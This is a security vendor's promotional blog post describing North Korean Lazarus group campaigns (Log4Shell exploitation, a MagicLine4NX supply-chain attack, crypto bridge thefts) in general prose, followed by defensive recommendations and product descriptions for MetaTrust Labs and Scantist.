The Rise of North Korean Cybercrime: How to Secure Your Web3 Development

On January 1, 2024, a hacker attack against Orbit Chain drew the attention of the global cryptocurrency community. According to reports, hackers exploited a vulnerability in Orbit Chain, stealing $81.5 million worth of cryptocurrencies and transferring them to other addresses. Orbit Chain officials have confirmed the incident and said they are working with international law enforcement agencies to track down the attackers' identity and motives. Some security researchers believe that the attack's methods and targets are similar to the style of the North Korean hacker group "Lazarus", which may be another cybercrime by the group. Who is "Lazarus", and why do their activities raise such high alert internationally? How does the group use cryptocurrencies to circumvent international sanctions and anti-money laundering measures?

What is Lazarus?

Lazarus is a well-known hacker group with a North Korean official background that has been operating for more than a decade since 2009. The group is known for targeting organizations worldwide, and its actions so far include attacks on financial institutions, media, and government agencies. Lazarus Group is controlled by the 121 Bureau under the North Korean General Bureau of Reconnaissance. The group is known for attacking banks and cryptocurrency exchanges, obtaining economic benefits by stealing funds and data. Lazarus Group treats programmers with high standards and encourages people with computer talents to join the official "hacker" ranks.

Pyongyang Automation University is one of the important sources of Lazarus Group hackers. The group has shifted its focus from political attacks to economic attacks, focusing on attacking the cryptocurrency world. Their activities also involve targeting security researchers, embedding malicious code in open-source cryptocurrency platforms, executing large-scale cryptocurrency robberies, and spreading malware through fake job interviews. These hacker groups use funds obtained by illegal means to go through the typical money laundering process adopted by traditional cybercrime groups, and the stolen cryptocurrencies are often converted into fiat currencies to evade anti-money laundering measures.

South Korea, the United States, and Japan have been on high alert for the activities of North Korean hacker groups. It is reported that North Korean hacker groups have successfully stolen $3 billion worth of cryptocurrency funds in the past few years, which have been used to support North Korea's nuclear and ballistic missile programs. Security advisers from the United States, South Korea, and Japan met in Seoul to discuss how to deal with North Korea's cyber risks and announced a new trilateral cooperation initiative, focusing on addressing North Korea's cybercrime and cryptocurrency laundering activities. The meeting was held at a time when tensions on the Korean Peninsula escalated, and North Korea accelerated the expansion of its nuclear weapons and missile programs and publicly demonstrated its attitude of using nuclear weapons preemptively.

Lazarus hacker group's attack methods and targets are diverse, ranging from SWIFT network attacks on financial institutions to more widespread cryptocurrency robberies, showing the group's high technical ability and threat. However, the preventive measures for these attacks are relatively few. Since 2018, North Korean hackers have stolen about $2 billion worth of virtual currencies. In 2023 alone, they stole about $200 million worth of cryptocurrencies, accounting for 20% of the stolen funds that year. These hackers pose a continuous threat to the virtual currency ecosystem, and their cyberattack methods are evolving and becoming more complex.

The scale of North Korean hacker groups' activities exceeds that of other malicious actors by 10 times, and they also target the decentralized financial ecosystem. They use various methods to carry out cyberattacks, including phishing, supply chain attacks, and other forms of hacking. Therefore, enterprises and individual users need to strengthen cybersecurity measures, update software regularly, strengthen password policies, and increase their awareness of cybersecurity. At the same time, regulators also need to strengthen supervision, formulate stricter laws and regulations to curb this kind of cybercrime.

Attack Case 1: Lazarus Uses Log4Shell Vulnerability to Conduct Blacksmith Operation

Attack process and means:

1. Exploiting Log4Shell vulnerability: Lazarus first exploited the Log4Shell vulnerability, which is a remote code execution flaw found in the Log4j logging library. Since this vulnerability was discovered and fixed two years ago, many systems may still have unpatched versions, it provided Lazarus with an entry point.
2. Proxy tool deployment: Once gaining initial access, Lazarus set up a proxy tool, which was used to maintain persistent access on the compromised server. This tool allowed them to run reconnaissance commands, create new administrator accounts, and deploy other credential stealing tools.
3. NineRAT deployment: In the second stage, Lazarus deployed the NineRAT malware on the system. NineRAT is a remote access trojan that can collect system information, upgrade to new versions, stop execution, uninstall itself, and upload files from the infected computer. It also contains a dropper, which is responsible for establishing persistence and launching the main binary.
4. DLRAT and BottomLoader usage: Lazarus also used DLRAT and BottomLoader. DLRAT is a trojan and downloader that allows Lazarus to introduce additional payloads on the infected system. BottomLoader is a malware downloader that can fetch and execute payloads from hard-coded URLs.
5. Credential stealing and persistence: Using tools such as ProcDump and MimiKatz to dump credentials, to obtain more system information. At the same time, by creating URL files in the system's startup directory, they achieved persistence of the new version or its deleted payload.
6. Reference links:

• https://www.csoonline.com/article/1259949/lazarus-apt-attack-campaign-shows-log4shell-exploitation-remains-popular.html
• https://nvd.nist.gov/vuln/detail/cve-2021-44228

Attack Case 2: Lazarus Uses MagicLine4NX Software to Launch Supply Chain Attack

Attack process:

1. Watering hole attack: Lazarus hacker group infiltrated websites that specific users frequently visit and embedded malicious scripts in them. When users using MagicLine4NX authentication software visited these websites, the embedded code would execute, and the hackers could fully control the system.
2. Spreading malicious code using system vulnerability: The hackers exploited a zero-day vulnerability in MagicLine4NX software, which allowed the personal computers connected to the network to access their internet server. Then, they used the data synchronization function to spread the malicious code to the business-side server.
3. Attempting data transfer: The malware tried to establish connections with two C2 servers, one of which was a gateway within the network system and the other one was outside the internet. If the connection was successful, a large amount of internal network information could be leaked.

Technical means:

1. Zero-day vulnerability exploitation: The hackers exploited a zero-day vulnerability in MagicLine4NX software, which was an undisclosed flaw that allowed them to access the target system without authorization.
2. Supply chain attack: By exploiting the vulnerability in the supply chain, the hackers were able to bypass the normal security measures and directly attack the target system.
3. Data synchronization and C2 server connection: The hackers used the data synchronization function to spread the malicious code to the business-side server and tried to establish a connection with the external C2 server to further control and steal data.
4. Reference links:

• https://www.zerofox.com/advisories/22471/
• https://nvd.nist.gov/vuln/detail/CVE-2023-45797

Attack Case 3: Attacks on Cryptocurrencies

Targets: Cryptocurrency exchanges, wallets, decentralized finance (DeFi) ecosystem Attack time: Since 2018, especially in 2023 Attack process and technical means:

1. Exploiting vulnerabilities and leaked private keys: North Korean hackers used phishing and supply chain attacks with leaked private keys or seed phrases to infiltrate targets.
2. Cross-chain attacks: They specifically targeted cross-chain bridges, such as Axie Infinity Ronin Bridge, to steal large amounts of virtual currencies. Multi-stage money laundering process: North Korean hackers have used a complex "multi-stage money laundering process" in the past to obscure the source and destination of funds. They converted the stolen virtual currencies into different tokens, and then mixed and exchanged them multiple times through automated programs, mixers, and cross-chain swaps, to increase the difficulty of tracking.
3. Using decentralized exchanges: They exchanged the stolen virtual currencies for Ether through decentralized exchanges, and then mixed and exchanged them multiple times.

Based on the above cases, attackers can steal sensitive data, including confidential business information, customer data, and personal identity information, resulting in privacy breaches and potential legal consequences. Since hackers can fully control the target system, they may obtain a large amount of sensitive information, including the internal data and customer profiles of the enterprise. Lazarus's hacker operations not only caused data leakage and system damage to the victimized organizations, but also may have a serious impact on the victims' business operations.

These attacks usually involve complex supply chain attacks, making prevention and detection more difficult. Attacks may cause financial losses, including the costs of malware removal, data recovery, and system repair, as well as revenue losses due to business interruption. The hackers' attacks resulted in a large amount of virtual currency being stolen, which not only caused economic losses to the victims, but also may expose their personal information and transaction data. Attacks on cross-chain bridges may paralyze the entire system, affecting the normal conduct of transactions.

To cope with such security threats, it is recommended that organizations take the following preventive measures:

1. Patch vulnerabilities in a timely manner: Ensure that security patches are applied in time to fix known vulnerabilities. Especially for software and components used in the supply chain, MetaScan's automated audit function can timely detect and patch potential vulnerabilities.

2. Strengthen supply chain security: Establish a secure partnership with supply chain partners, review and verify software and components, and ensure that each link in the supply chain is not attacked by hackers. With MetaScout's monitoring function, you can dynamically update the blacklist and block attacks from potential North Korean hacker addresses.

3. Security awareness training: Strengthen employee security awareness training. Educate employees on the importance of being alert to watering hole attacks, malicious scripts, and supply chain security, to reduce the impact of human factors on security. Scantist's DevSecOps solution can provide organizations with one-stop security training and guidance.

4. Network traffic monitoring: Implement network traffic monitoring and intrusion detection systems (IDS/IPS), and timely detect abnormal activities and attack behaviors. MetaScout's attack blocking mechanism can combine network traffic monitoring, timely identify and block hacker attacks on transactions.

5. Multi-layer defense: Adopt multi-layer defense measures, including firewalls, intrusion detection systems, anti-virus software, etc., to improve the security of the system. MetaScan's Prover function can be used in conjunction with existing security tools and measures, forming a more comprehensive defense system.

6. Continuous monitoring and response: Establish a security monitoring and response mechanism, monitor network and system activities in real time, timely detect abnormal behaviors and take appropriate response measures, to minimize the losses caused by attacks. Scantist's component analysis function can continuously monitor the vulnerabilities in the software supply chain and timely intercept problematic open source and third-party components.

7. Strengthen the security measures of cryptocurrency exchanges and wallets: Cryptocurrency exchanges and wallets should strengthen their security measures, such as using strong passwords, regularly changing private keys, implementing multi-layer security policies, etc. MetaScout's blocking mechanism can provide cryptocurrency exchanges with attack blocking protection based on dynamic blacklists, ensuring the security of users' digital assets.

8. Regular audits and inspections: Organizations should regularly conduct security audits and inspections of the system, to ensure that there are no potential security vulnerabilities. MetaScan's automated audit function can help organizations conduct a comprehensive security assessment and timely detect potential vulnerabilities and risks.

9. Raise public awareness: Educate the public about the importance of cybersecurity, and let them know how to protect their digital assets. Organizations can raise public awareness of cybersecurity through publicity campaigns, social media, and other channels, and provide relevant security advice and guidance.

It should be noted that security threats and preventive recommendations should be evaluated and customized according to the actual situation and the latest security intelligence. In addition, regular backup and recovery of data, using strong passwords and multi-factor authentication, limiting privileged access, etc. are also effective measures to improve security.

About MetaTrust Labs

MetaTrust Labs is a leading security service provider dedicated to creating a secure infrastructure for web 3.0 developers. We provide automated security vulnerability scanning service MetaScan, integrating multiple advanced security scanning engines, to protect all aspects of the application beyond the smart contract layer. In addition, we also provide MetaScout's 24/7 runtime security monitoring service, and MetaScore's comprehensive security and risk assessment service.

Moreover, our Prover tool is a powerful smart contract formal verification tool, suitable for Solidity programming language. It provides rigorous Solidity code semantic analysis, and generates comprehensive verification error reports, for effective fault localization. With MetaTrust Labs and our security tools and services, developers can build a secure and reliable web 3.0 development environment, ensuring the security and reliability of the application.

Website：metatrust.io

Twitter: @MetaTrustLabs

Linkedin: https://www.linkedin.com/in/metatrust

Telegram: https://t.me/metatrustlabs

About Scantist

Scantist is a solution for code quality management that seamlessly integrates into projects and workflows, ensuring consistent code quality standards. Through integrated policy management, it ensures that the code meets predefined quality standards. Its fast, real-time analysis function provides actionable insights, helping to solve code problems. By integrating with IDE, it can detect code problems in real time, speeding up the process.

Scantist has comprehensive code evaluation capabilities, which can evaluate the code quality and security of more than 20 languages and frameworks, becoming the central reference for all projects. With more than 5,000 coding rules and extensive program analysis, it provides accurate feedback. Through enterprise-level reporting, it conducts comprehensive risk assessment and monitoring. At the same time, Scantist's solution has customization flexibility and scalability, which can adapt to your unique needs, providing flexible pricing and deep integration, meeting the requirements of enterprises.

Scantist can also easily integrate with top DevOps platforms (such as GitHub, GitLab, Azure, Bitbucket) and major CI tools, achieving fast project access and continuous code analysis. It simplifies the workflow, improves productivity and efficiency. By providing support for developers and DevSecOps teams, Scantist can actively enhance software security, provide wise component selection, simplify code review, and promote the code quality, compliance, and efficient development process of the development team.

Website：scantist.com

Linkedin: https://www.linkedin.com/company/scantist